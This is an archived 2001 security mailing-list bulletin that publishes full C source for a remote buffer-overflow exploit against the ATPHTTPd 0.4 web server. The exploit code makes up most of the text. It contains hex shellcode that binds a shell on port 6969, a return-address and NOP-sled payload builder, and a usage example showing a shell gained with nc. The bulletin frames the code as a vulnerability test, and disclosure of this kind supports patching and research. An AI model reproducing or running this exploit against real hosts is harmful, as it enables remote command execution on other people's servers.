[EXPL] ATPHTTPd Buffer Overflow Exploit Code
From: support@securiteam.comDate: 12/21/01
- Previous message: support@securiteam.com: "[NEWS] Dangerous Information Recorded in CentraOne Log Files"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Fri, 21 Dec 2001 13:40:06 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
ATPHTTPd Buffer Overflow Exploit Code
------------------------------------------------------------------------
SUMMARY
<http://www.redshift.com/~yramin/atp/atphttpd/> ATPHTTPd, the tiny,
caching, high performance webserver suffers from a buffer overflow problem
that allows remote command execution. The following is an exploit code
that can be used to test for this vulnerability.
DETAILS
Vulnerable systems:
ATPHTTPd version 0.4
Exploit:
/* remote exploit for ATPhttpd 0.4 */
/* www: $Id: atphttpd-smack.c,v 1.2 2001/12/16 22:00:57 dmuz Exp $ */
/* $_Id: atphttpd-smack.c,v 1.27 2001/12/15 08:28:24 methodic Exp $ */
/* Another 31336++ codez from AngryPacket */
/*
* "Tamer Sahin" <ts@securityoffice.net> posted to BUGTRAQ that there
* was a DoS condition in ATPhttpd on 13 Dec 2001. I downloaded the
* source for the hell of it. Ran ye old perl Ax4000|nc and did some
* gdb'n and noticed that it said the return address was 0x41414141.
* Well that speaks for itself...
*
* - dmuz@angrypacket.com
*/
/*
* developed and tested against OpenBSD. exploit creates a port-binding
* shell on the remote machine on port 6969 with the uid of the server.
* try offsets between 5000 and -5000 with increments of 100. -200 worked
* like a charm for me.
*
* ./atphttpd-smack -h 127.0.0.1 -p 80 -o -200
* [methodic@vulnhost] [~]$ nc localhost 6969
* whoami
* methodic
* id
* uid=1009(methodic) gid=1009(methodic)
* ^C punt!
*
* mad thankz to vegac who helped me with a lame bug i was over looking
*/
/* this exploit code by methodic with a little from dmuz */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
/* 701 A's to own the EIP */
#define LEN 900
#define NOP 0x90
/* port binding shellcode (6969/tcp) by noir */
long shellcode[]=
{
0x4151c931,0x51514151,0x61b0c031,0x078980cd,
0x4f88c931,0x0547c604,0x084f8902,0x0647c766,
0x106a391b,0x5004478d,0x5050078b,0x68b0c031,
0x016a80cd,0x5050078b,0x6ab0c031,0xc93180cd,
0x078b5151,0xc0315050,0x80cd1eb0,0xc9310789,
0x50078b51,0xb0c03150,0x4180cd5a,0x7503f983,
0x5b23ebef,0xc9311f89,0x89074b88,0x8d51044f,
0x078b5007,0xc0315050,0x80cd3bb0,0x5151c931,
0x01b0c031,0xd8e880cd,0x2fffffff,0x2f6e6962,
0x90416873
};
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
int main(int argc, char *argv[]) {
int sockfd=0, port=0, offset=0;
int ch, i;
long retaddr;
char *host=NULL, http_request[LEN+20];
char *payload, *ptr=(char *)&shellcode;
struct sockaddr_in s;
while ((ch = getopt(argc, argv, "h:p:o:")) != -1) {
switch (ch) {
case 'h':
host = optarg;
break;
case 'p':
port = atoi(optarg);
break;
case 'o':
offset = atol(optarg);
break;
}
}
printf(">> atphttpd 0.4b exploit, written by angrypacket security
crew\n");
if(!host) {
usage(argv[0]);
}
if(!port) {
port = 80;
}
/* setup socket structure */
bzero(&s, sizeof(s));
s.sin_family = AF_INET;
s.sin_port = htons(port);
s.sin_addr.s_addr = inet_addr(host);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror(" + socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&s, sizeof(s)) == -1) {
perror(" + connect");
exit(1);
}
/* build c0dez.. */
payload = (char *)malloc(LEN);
retaddr = get_sp() - offset;
printf(" + building payload [retaddr: 0x%lx] [offset: %ld]\n", retaddr,
offset);
/* fill the buffer with return addr's */
for(i = 0; i < LEN; i += 4)
*(long *)&payload[i] = retaddr;
/* fill in some NOPs */
for(i = 0; i < ((LEN/2) - 100); i++)
*(payload + i) = NOP;
/* copy the shellcode and terminate the payload string */
memcpy(payload + i, ptr, strlen(ptr));
payload[LEN-1] = '\0';
bzero(&http_request, LEN+20);
strcpy(http_request, "GET ");
strcat(http_request, payload);
strcat(http_request, " HTTP/1.0\r\n\r\n");
free(payload);
printf(" + sending payload to <%s> on port [%d].. ", host, port);
send(sockfd, http_request, strlen(http_request), 0);
printf("done\n");
close(sockfd);
printf(" + now connect to port 6969 on <%s> (be good!)\n", host);
printf(">> visit http://sec.angrypacket.com for more security tools\n");
return(0);
}
int usage(char *progname) {
fprintf(stderr, "usage: %s -h <target ip> -p <target port> -o
<offset>\n", progname);
exit(0);
}
ADDITIONAL INFORMATION
The information has been provided by
<mailto:methodic@slartibartfast.angrypacket.com> Methodic.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NEWS] Dangerous Information Recorded in CentraOne Log Files"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
